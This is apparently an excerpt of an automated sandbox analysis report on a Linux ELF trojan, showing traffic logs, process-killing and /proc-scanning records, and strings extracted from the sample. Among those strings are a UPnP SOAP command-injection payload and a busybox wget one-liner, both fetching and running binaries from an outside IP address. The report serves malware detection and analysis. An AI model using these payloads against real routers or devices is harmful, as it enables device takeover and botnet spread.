7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 09:39:40 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=180, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:30:12 GMTConnection: CloseCache-Control: no-storeX-Content-Type-Options: nosniffX-Frame-Options: DENYContent-Security-Policy: default-src 'none'; frame-ancestors 'none'; script-src 'none'; object-src 'none'; connect-src *.ookla.com *.speedtest.net *.speedtestcustom.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 14 Feb 2024 08:30:19 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.22.1</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Wed, 14 Feb 2024 08:30:22 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>
    Source: uR2hnJKQGC.elfString found in binary or memory: http://141.98.10.72/bins/x86
    Source: uR2hnJKQGC.elfString found in binary or memory: http://141.98.10.72/zyxel.sh;
    Source: uR2hnJKQGC.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: uR2hnJKQGC.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

    System Summary

    barindex
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 720, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 759, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 788, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 800, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 847, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 884, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 936, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 1334, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 1335, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 1872, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2096, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2097, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2102, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2180, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2208, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2275, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2281, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2285, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2289, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2294, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 6275, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 6277, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 720, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 759, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 788, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 800, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 847, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 884, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 936, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 1334, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 1335, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 1860, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 1872, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 6271, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 6278, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 6282, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 6289, result: successfulJump to behavior
    Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 720, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 759, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 788, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 800, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 847, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 884, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 936, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 1334, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 1335, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 1872, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2096, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2097, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2102, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2180, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2208, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2275, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2281, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2285, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2289, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 2294, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 6275, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6271)SIGKILL sent: pid: 6277, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 720, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 759, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 788, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 800, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 847, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 884, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 936, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 1334, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 1335, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 1860, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 1872, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 6271, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 6278, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 6282, result: successfulJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)SIGKILL sent: pid: 6289, result: successfulJump to behavior
    Source: classification engineClassification label: mal88.spre.troj.linELF@0/0@0/0
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1582/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2033/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2275/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/3088/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1612/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1579/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1699/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1335/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1698/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2028/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1334/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1576/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2302/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/3236/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2025/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2146/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/910/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/4444/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/4445/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/912/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/4446/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/517/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/759/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/4447/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2307/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/918/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/6242/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1594/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2285/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2281/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1349/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1623/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/761/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1622/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/884/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1983/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2038/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1344/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1465/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1586/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1860/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1463/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2156/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/800/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/801/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1629/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/5823/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1627/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1900/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/6254/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/6253/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/3021/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/491/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2294/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2050/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1877/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/772/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1633/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1599/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1632/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/774/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1477/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/654/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/896/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1476/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1872/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2048/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/655/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1475/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2289/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/656/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/777/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/657/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/658/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/419/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/936/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1639/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1638/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2208/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2180/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1809/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/4520/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1494/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1890/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2063/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2062/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1888/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1886/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/420/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1489/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/785/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1642/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/788/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/667/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/789/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/1648/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/4517/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/6275/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/6278/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/6277/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2078/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2077/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2074/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/2195/exeJump to behavior
    Source: /tmp/uR2hnJKQGC.elf (PID: 6285)File opened: /proc/670/exeJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52140
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52146
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52164
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52172
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52174
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52176
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52190
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52214
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52238
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52244
    Source: unknownNetwork traffic detected: HTTP traffic on port 39832 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 39832
    Source: unknownNetwork traffic detected: HTTP traffic on port 50368 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 50368
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34698
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34774
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34788
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34802
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34822
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34848
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34866
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34876
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34884
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34894
    Source: unknownNetwork traffic detected: HTTP traffic on port 52504 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 52504
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43390
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43416
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43448
    Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43506
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 54980
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43516
